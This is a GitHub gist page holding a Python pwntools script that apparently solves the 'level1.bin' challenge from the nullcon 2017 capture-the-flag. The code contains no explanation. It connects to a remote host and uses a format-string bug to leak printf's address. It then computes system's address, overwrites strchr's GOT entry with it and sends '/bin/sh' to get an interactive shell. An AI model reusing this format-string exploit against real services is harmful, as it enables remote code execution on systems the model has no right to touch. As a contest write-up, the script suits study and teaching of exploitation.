Created
March 26, 2017 11:46
Revisions
-
rverton created this gist
Mar 26, 2017 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,46 @@ #!/usr/bin/python # exploit for level1.bin (nullcon 2017) from pwn import * def add_book(p): p.sendline('1') p.recvuntil('Enter book name: ') p.sendline('a') p.recvuntil('Enter book id: ') p.sendline('1') def leak_addr(p, addr): p.sendline('3') p.recvuntil('Enter query: ') leak_fmt_str = p32(addr) + "%11$s" p.sendline(leak_fmt_str) result = p.recvline().strip() return u32(result[20:24]) if __name__ == '__main__': #p = process('./level1.bin', stdin=process.PTY) p = remote('34.198.96.6', 9001) p.recvuntil('Enter choice: ') add_book(p) p.recvuntil('Enter choice: ') printf = leak_addr(p, 0x804b014) printf_offset = 0x0004cdd0 system_offset = 0x0003fe70 system = printf - printf_offset + system_offset strchr_got = 0x804b030 log.info("printf @ %#x" % printf) log.info("system @ %#x" % system) payload = "/bin/sh # " payload += fmtstr_payload(14, {strchr_got: system}, numbwritten=12) p.sendline('3') p.recvuntil('Enter query: ') p.sendline(payload) p.interactive()